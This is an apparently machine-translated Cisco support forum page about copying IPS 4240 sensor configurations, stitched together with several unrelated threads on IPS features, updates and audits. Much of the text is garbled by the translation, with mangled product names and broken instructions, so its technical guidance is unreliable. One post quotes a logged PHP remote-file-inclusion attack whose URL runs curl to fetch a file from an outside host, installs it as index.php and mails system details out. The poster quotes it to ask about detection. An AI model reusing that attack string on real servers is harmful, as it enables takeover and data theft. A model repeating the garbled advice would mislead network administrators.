Deployment of Cisco IPS 4240 devices
I can't find all the information about the Cisco IPS 4240 features massive deployments. I have 6 devices, I intend to drive to several remote sites and tie in a centralized unit of Cisco MARCH. Without the help of any CSM/LMS software, is there a quick and dirty to pull this off? I think to set up a single IPS appliance, then pull and distribute the configuration file for the remaining devices. I would like to see how others have done this...
If all of your sensors are of the same type (all 4240 to your situation) and will execute all the even correct configuration, then the copy command will help out you.
There is a new feature added to the copy command in IPS 6.1 which will help you during the copying of config of one sensor to another.
Complete you configure a sensor (using IME, IDM or CLI). When you are satisfied with the configuration, and then use the command copy to copy ON a server of SCP.
Now bringup a second sensor and configure basic networking through the Installer settings (ip address, gateway, etc...).
Now, use the command copy to copy the first configuration of sensors from the SCP server in the running of the second probe configuration on the second.
It will ask you to change the network settings on the second probe.
Answer n °
The rest of the configuration of the probe first copy will be placed in the second sensor.
The second sensor will keep its own unique IP address but win the rest of the configuration of the config of the first probe.
Continue to do this with additional sensors.
The process can then be repeated every time that additional changes are made to the first sensor.
Remember though that this only works if the configuration of the probe will be exactly duplicated (including what interfaces would be monitored and how).
If each sensor will have some unique tunings, then you need to manage each sensor on its own or buy CSM which can be used to share only parts of the configuration of multiple sensors.
Tags: Cisco Security
Similar Questions
-
Not entirely taken TLS supported in Cisco IPS 4240
I am trying to contact a Cisco IPS 4240 device while having security settings FIPS enabled on the client using SSL. This is not possible because the device does not support TLS extensions in the Client Hello packet (RFC 5746) sent by the client when using TLS (SSL3 and lower are not FIPS compatible). The IDM application that communicates with the device does not send these extensions (im seeing this with WireShark) TLS is able to connect to it.
Is it possible to provide the 4240 support these TLS extensions?
This is related to the bugs below. The original solution will be included in the 7.1.5 release which is preparing to take in charge the platform 4240 among others. This will allow the Web server IPS to ignore short-term extensions. The long-term solution will require an update to the Web server so that it is fully compliant with RFC 5746.
Todd
-
Recovery v1 in cisco IPS SSL Session key
Hi all
In network audit, I have the comment mentioned by the auditor for cisco IPS 4270 device. but I don't get any solution for the same thing. Kindly help me out on this.
V1 SSL Session key recovery
The remote SSH daemon supports connections made
using the version 1.33 or 1.5 of the SSH
Protocol. These protocols are not completely
cryptographically safe so they should not be used.
With respect,
Sashi
Currently there is no way only allow SSH version 2 and disable SSH version 1 on IPS.
Here is the request for improvement which have been filed for your reference:CSCsk84977
Hope that answers your question.
-
IPS 4240 high availability?
Hello
4240 running in HA mode?
Or should I look at 4255 if I need to work in HA mode?
Kindly help me with this info... Thanks in advance.
Kind regards
RAMJust to add a little bit to Bob's response. It is possible for the HA, but as mentioned above, it is not HA as you would expect of a firewall and requires significant network planning and is rather technical in nature.
The best documentation I could find about the designs HA is in chapter 21 - "Deploying Cisco IPS for high availability" and High Performance of Earworms security CCNP 642-627 official Cert Guide, ISBN: 9780132372107. She gets quite detailed and explains a large number of different methods.
I was also able to find some information on this site, but it is at a higher level and does not provide as many options.
https://www.NetworkWorld.com/community/node/18384
I had to work HA in some of our environments, and I'm here to tell you, plan ahead, far in advance, test several methods to find one that suits. We were using a method that I just couldn't find it mentioned anywhere.
-
Cisco ips automatically updated link signature?
Hi allI would like to know what address or the link that we need to the IPS-4240 signature automatically update from cisco.In our Setup IPS show this link. is this correct?username sabirins1978
Cisco-url https://198.133.219.25//cgi-bin/front.x/ida/locator/locator.plThank you.Kind regardsBudyYes like the following should work
https://www.Cisco.com/cgi-bin/front.x/IDA/Locator/Locator.pl
Concerning
Farrukh
-
Cisco IPS 4200 Signature Update
We are currently under evaluation and implementation of the Cisco IPS solution to our security needs.
Our supplier has said that the signature 'online' updates to Cisco IPS is not possible - this is a manual process and we need to charge the device if you want to update the files.
Somehow, it defies logic. Surely, I think, that any IP address should have the possibility of obtaining signatures updated "online".
I apologize, because that question is too basic in nature. But could someone shed more light on this?
Thank you.
You have auto update functionality of Cisco IPS version 6.0, take a look at the attached picture.
Update of signatures is * recommended * that you reload the signatures (restart the sensor), although this is not mandatory.
Our IPS has not been restarted for over two months now and everything is working ok.
Automatic update
Automatic update
Automatic update
-
I have two IPS 4240 s that can be placed between our internal network and our extranet firewall. The game of firewall is your pair of standard assets/ASA-5520 switch connected to both switches.
Q1 - if I'm not worried about atomic attacks, is there another advantage that IPS inline on promiscuity?
Is Q2 - If inline or promiscuity, necessary to connect the unique IPS for two switches in order to receive packets when a failover of the SAA occurs? If so, does physically or through RSPAN?
Q3 - if the IPS fails and it is set online, interfaces fail open (traffic continues to pass) or closed (traffic is removed)? I couldn't find that on the Cisco site.
Thank you!
"Promiscuous" mode, you can use a 4240 and extend the output of each switch in two interfaces of remote sensing of the 4240 (it has four available). A single 4240 should even be able to set up TCP sessions that span the two rails, as in the case of a failover.
-
IPS-4240 engine upgradation procedure of E3 E4
Hi all
Can someone help me to upgrade the IPS 6.0 (1) 7.0 E1 (2) E4.
What are the images need to be upgraded for this?
What is the appropriate procedure for upgradation?
Here is the version for your reference results show...
========================================
Cisco IPS #.
Cisco-IPS # sh ver
Application partition:Cisco Intrusion Prevention System, Version 1.0000 E3
Host:
Domain keys key1.0
Definition of signature:
Update of the signing S479.0 2010-03-19
Virus update V1.4 2007-03-02
OS version: 2.4.30 - IDS-smp-bigphys
Platform: IPS-4240-K9
Serial number: JMX1244L0PK
License expires: December 31, 2010 UTC
Sensor time is 211 days.
With the help of 1439252480 of 1984552960 memory available bytes (72% of use)
the application data uses 44.0 M off 166,8 M bytes of disk space available (28% of use)
startup is using 39.7 M off 68.6 M bytes of disk space available (61% of use)MainApp to E-2008_OCT_16_16_24 (release) 2008-10-16 T 16: 40:57 - 0500 Running
AnalysisEngine-E-2008_OCT_16_16_24 (release) 2008-10-16 T 16: 40:57 - 0500 Running
CLI-E-2008_OCT_16_16_24 (release) 2008-10-16 T 16: 40:57 - 0500Upgrade history:
* IPS - GIS - S465 - req - E3 23:00:43 UTC Thursday, January 28, 2010
IPS-GIS-S479-req - E3.pkg 00:05:37 UTC Wednesday, April 7, 2010Version 1.1 - 1, 0000 E3 recovery partition
Valid certificate from the host: November 17, 2008 to November 18, 2010
Cisco IPS #.
Cisco IPS #.
=================================
Kind regards
Anuj Pratap
No, do not reimage system (IPS-4240-K9-sys-1.1-a-7.0-2-E4.img), which would eliminate all of your configuration.
Just perform the upgrade using this upgrade file: IPS-K9-7, 0-2 - E4.pkgand which would automatically be updated to 7.0.2 (E4).
-
Hi all
I have one unit of IPS-4240. I want to know if my sensor or the unit itself fails / stops, is there an option where in my traffic will be passed so that there is no downtime.
Thank you
Pratik
You can configure the sensor when it is inline with inline-bypass 'auto' mode mode so when the unit does not work, it will just pass through traffic without inspection, however, if the sensor is completely shutdown, then no, the traffic will be dropped when in inline mode.
Here is more information on derivation inline mode:
However, if she is in promiscious mode, so you don't have to worry about this because the package is not "inline" and will cause no disruption.
Hope that helps.
-
use of 100% of Cisco ips 4270 cpu...
Hi people I have cisco ips 4270 version 7.0 (2) E3 when I try to access through IDM his show the cpu1 CPU = 100% and 100% = cpu4, but vary cpu1 and cpu2 can you please tell me what will be the solution to this problem...
When I try to go to the configuration then its give me error... attached document attached please check...
Hello
Having 100% on some of your CPU is normal on the platform of the IPS.
The device uses cycles slowed down it is to prepare for the handling of incoming packets and reduce the delay that it will introduce on their way, then is expected to get even under low load.
If you want to get a better idea of capacity by % of your IPS you are currently using, you should have a look at the value of the load of the Inspection. Looking at the data that you have provided, you are about 25% at present.
For the message timeout rdep, it seems to be a software problem. Looking more closely at the image you attached, you can also see "analysis engine status: no answer.
It is somewhat difficult to troubleshoot those on CSC, so I suggest to prosecute TAC if you want to know the exact origin of cause.
What I advise is upgraded to the latest code of 7 (0) which is I believe 7.0 E4 (5A), since it is more then likely fixed in this version.
If you are looking for a quick fix, a reboot of the PPE must erase this but the problem will more then likely return later.
Kind regards
Nicolas
-
IPS two devices with the same UUID
I have two Sourcefire\Cisco IPS sensors deployed and which have been identified as having the same UUID. As you can imagine, this is causing all sorts of questions. Has he never been seen before, and if so is there a solution?
-------------------[ SENSOR 1]--------------------
Model: 3 D 7120 (63) Version 5.4.0.4 (Build 55)
UUID: 46ffa0d8-4907-11e4-8669-d32acdb6a95e
Version VDB: 258
----------------------------------------------------
------------------[ SENSOR 2]-----------------
Model: 3 D 7120 (63) Version 5.4.0.4 (Build 55)
UUID: 46ffa0d8-4907-11e4-8669-d32acdb6a95e
Version VDB: 258
----------------------------------------------------
I've not seen this before.
I guess you have to remove the two sensors, reinstall their software and add to the Management Center.
-
Upgrade version of CISCO IPS signature
Hi guys:
Anyone know the process for updating the signature on a CISCO IPS version, I want to do it manually. If somedoy can tell me the orders and all I have to do this.
Concerning
Luis;
Updats manual signature for Cisco IPS sensors can be performed from the CLI as shown here:
Or from the interface of the IDM as shown here:
This process is also used to upgrade software base of the probe.
Scott
-
Hello
Does anyone know, when will be available 4xFE cards for IPS-4240 (for total 8 interfaces)?
Kind regards
Krzysztof
The option card for IPS-4240/4255 sensors will be a card 4GE to support copper (RJ45) and fiber (SX) connections. It will allow a total of 8 RJ45 interfaces or 4 SX fiber interfaces (and 4 RJ45 interfaces) on these platforms. Unfortunately, it will be probably available for another 9 months or more.
-
Hi guys,.
I need list of PDF complete cisco ips signatures.
Can someone help me find a link or a pdf?
Thank you all,
JV
Hello
I couldn't find any method to export the list of signatures. This could be because there are thousands of them.
However, you can use the following link to find signatures of details.
http://Tools.Cisco.com/Security/Center/home.x
SPSP
-
PHP exploit triggers Cisco Security Agent but NOT at Cisco IPS... why?
Does anyone know what signing this feat should trigger with the Cisco IPS sensor? You are not sure if there is one, or if we turned it off?
We see this feat hit our Exchange servers several times during the week.
The process of "C:\WINNT\System32\inetsrv\inetinfo.exe" (as user NT AUTHORITY\SYSTEM) received the data ' / index2.php? option = com_content & do_pdf = 1 & id = 1index2.php? _REQUEST [option] = com_content & _REQUEST [Itemid] = 1 & GLOBALS = & mosConfig_absolute_path =http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: / / 220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%[email protected] / * /; uname%20-a%20|%20Mail%20-s%20uname_i2_66.224.194.188%[email protected] / * /. com; echo |'.
I think that this could be the exploit of mambo. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for the info. I searched on mambo MySDN and found GIS 5163 "Mambo Site Server Administration Password ByPass" here is a snippet of the description: "administrative access is acquired by sending a specific url using the index2.php script and the PHPSESSID variable." This looks like what you pasted. Note "index2.php". Your IPS can not seen this so it was more than 443.
Hope this helps
M
Maybe you are looking for
-
IV update my windows phone bt Skype integrated displays error message 0 x 80070005 im using windows 10 what what do I do
-
Satellite P745-S4217: no WLan connection if 10 to 12 feet of router
Hello world! I have a problem with my wify conecction.When Im near the router, the conecction wifi works perfectly, I get a full wifi indicator on windows and I have no trouble surfing the web. But when I move 10 or 12 feet away from the router, alth
-
When this laptop from HP ENVY 15 - ae178TX laptop computer comes to Singapore for sale?
-
Iomega floppy drive does not work
Floppy drive does not work. Always has.
-
Change filePicker 'Save' label of button in mode FilePickerMode.SaverMultiple
Hello I use the FilePickerMode.SaverMultiple mode on a filePicker to allow the user to select a file for my application process. However, the label of the button 'Save' is very misleading. Is it possible to change the label of the button to something